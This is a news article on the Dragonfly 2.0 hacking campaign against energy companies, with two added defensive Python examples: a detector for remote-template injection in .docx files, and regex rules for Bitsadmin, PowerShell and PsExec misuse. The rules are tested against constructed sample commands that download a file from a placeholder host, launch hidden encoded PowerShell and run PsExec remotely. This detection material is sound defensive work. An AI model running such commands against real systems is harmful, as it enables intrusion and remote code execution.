The notorious hacking group, which has been operating since at least 2011, has re-emerged and is still interested in targeting US and European companies in the energy sector.
Yes, I am talking about 'Dragonfly,' a well-resourced, Eastern European hacking group responsible for sophisticated cyber-espionage campaigns against the critical infrastructure of energy companies in different countries in past years.
In 2014, we reported on the Dragonfly group's ability to mount sabotage operations against its targets: mainly oil pipeline operators, electricity generation firms and other Industrial Control Systems (ICS) equipment providers for the energy sector.
Researchers from cyber security firm Symantec, who discovered the previous campaign, are now warning of a new campaign, which they dubbed Dragonfly 2.0, saying "the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so" and that it has already gained unprecedented access to operational systems of Western energy firms.
Here are the major highlights of the group's activities outlined in the new report from Symantec:
- The hacking group has been active since late 2015 and is reportedly using the same tactics and tools that were used in earlier campaigns.
- The major objective of the Dragonfly 2.0 group is to collect intelligence and gain access to the networks of the targeted organisation, eventually making the group capable of mounting sabotage operations when required.
- Dragonfly 2.0 mainly targets the critical energy sectors in the U.S., Turkey, and Switzerland.
- Like previous Dragonfly campaigns, the hackers are using malicious email attachments (containing very specific content related to the energy sector), watering hole attacks, and Trojanized software as an initial attack vector to gain access to a victim's network.
- The group is using a toolkit called Phishery (available on GitHub) to perform email-based attacks that use template injection to steal victims' credentials.
- The malware campaign involves multiple remote access Trojans masquerading as Flash updates, called Backdoor.Goodor, Backdoor.Dorshel and Trojan.Karagany.B, allowing attackers to gain remote access to the victim's machine.
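To give defenders a concrete check for the template-injection trick mentioned above, here is an added example (not code from the original article, from Symantec, or from the Phishery project) that inspects a .docx for an external attached-template relationship, the mechanism that makes Word fetch a remote template and prompt for credentials when the file is opened. The two fixtures and the example.invalid URL are constructed for the demonstration.

```python
"""Flag .docx files whose settings reference a remote attached template."""
import io
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace and the relationship type Word uses for an attached template.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
SETTINGS_RELS = "word/_rels/settings.xml.rels"  # where Word keeps that relationship


def remote_templates(docx_bytes: bytes) -> list:
    """Return every http(s) URL the document would load as its attached template."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return []  # no settings relationships at all, so nothing can be fetched
        root = ET.fromstring(z.read(SETTINGS_RELS))
    hits = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        target = rel.get("Target", "")
        # A normal template points at a local file; an external http(s) target makes
        # Word contact that host when the file opens, which is the credential-prompt trick.
        if rel.get("TargetMode", "").lower() == "external" and target.lower().startswith(("http://", "https://")):
            hits.append(target)
    return hits


def build_fixture(rels_xml: str) -> bytes:
    """Assemble a minimal constructed .docx, just enough structure for the check above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(SETTINGS_RELS, rels_xml)
    return buf.getvalue()


# Constructed fixtures: a clean document (local template) and one with a remote template reference.
CLEAN_RELS = (
    f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="file:///C:/Templates/Normal.dotm" TargetMode="External"/></Relationships>'
)
INJECTED_RELS = (
    f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="http://example.invalid/template.dotx" TargetMode="External"/></Relationships>'
)
```

Run `remote_templates(build_fixture(INJECTED_RELS))` to see the flagged URL; the same function applied to real attachments at a mail gateway is a cheap pre-delivery check.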
However, Symantec researchers did not find any evidence of the Dragonfly 2.0 group using any zero-day vulnerabilities. Instead, the hacking group strategically uses publicly available administration tools like PowerShell, PsExec, and Bitsadmin, making attribution more difficult.
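Because these are legitimate administration tools, the detection opportunity is in how they are invoked rather than in the binaries themselves. The following added example (not from the article or from Symantec) runs a few command-line rules for Bitsadmin, PowerShell and PsExec over constructed process-creation events; the user names, hosts, URL and the base64 blob are all made up for the demonstration.

```python
"""Flag living-off-the-land tool use in process-creation events (constructed sample)."""
import re

# Constructed events in a simplified "user|image|command line" form, not real telemetry.
SAMPLE_EVENTS = [
    r"CORP\alice|C:\Windows\System32\notepad.exe|notepad.exe report.txt",
    r"CORP\svc_backup|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job /download /priority high http://example.invalid/u.bin C:\Users\Public\u.bin",
    r"CORP\bob|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc QQBCAEMA",
    r"CORP\admin|C:\Tools\PsExec.exe|PsExec.exe \\fileserver01 -s cmd.exe",
    r"CORP\carol|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-Process",
]

# (rule name, case-insensitive regex applied to the command line, reason shown to the analyst)
RULES = [
    ("bitsadmin_download",
     r"\bbitsadmin(\.exe)?\b.*\s/(transfer|addfile)\b.*https?://",
     "BITS job used to pull a file from a web server"),
    ("powershell_hidden_or_encoded",
     r"\bpowershell(\.exe)?\b.*(\s-(e|ec|enc|encodedcommand)\s|\s-w(indowstyle)?\s+hidden\b)",
     "PowerShell launched hidden or with an encoded command"),
    ("psexec_remote_exec",
     r"\bpsexec(\.exe)?\b.*\\\\\S+",
     "PsExec targeting a remote host"),
]


def scan(events):
    """Return one alert per (event, rule) match; ordinary interactive use produces none."""
    alerts = []
    for line in events:
        user, image, cmdline = line.split("|", 2)
        for name, pattern, reason in RULES:
            if re.search(pattern, cmdline, re.IGNORECASE):
                alerts.append({"rule": name, "user": user, "image": image, "reason": reason})
    return alerts
```

On the sample, `scan(SAMPLE_EVENTS)` raises exactly three alerts (the BITS download, the hidden encoded PowerShell and the remote PsExec) while the plain Notepad and `Get-Process` events pass untouched.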
"The Dragonfly 2.0 campaigns show how the attackers may be entering into a new phase, with recent campaigns potentially providing them with access to operational systems, access that could be used for more disruptive purposes in future," Symantec believes.
Cyber attacks on energy grids are not a new thing. Energy companies in Ukraine were targeted by hackers on two different occasions, in late 2015 and late 2016, which actually caused power outages across several regions of Ukraine, leaving tens of thousands of citizens in a blackout around midnight.
Moreover, nuclear facilities in the United States, including Wolf Creek Nuclear Operating Corporation, were targeted by a well-known Russian group back in July this year, but luckily there is no proof of whether the hackers were able to gain access to the operational systems or not.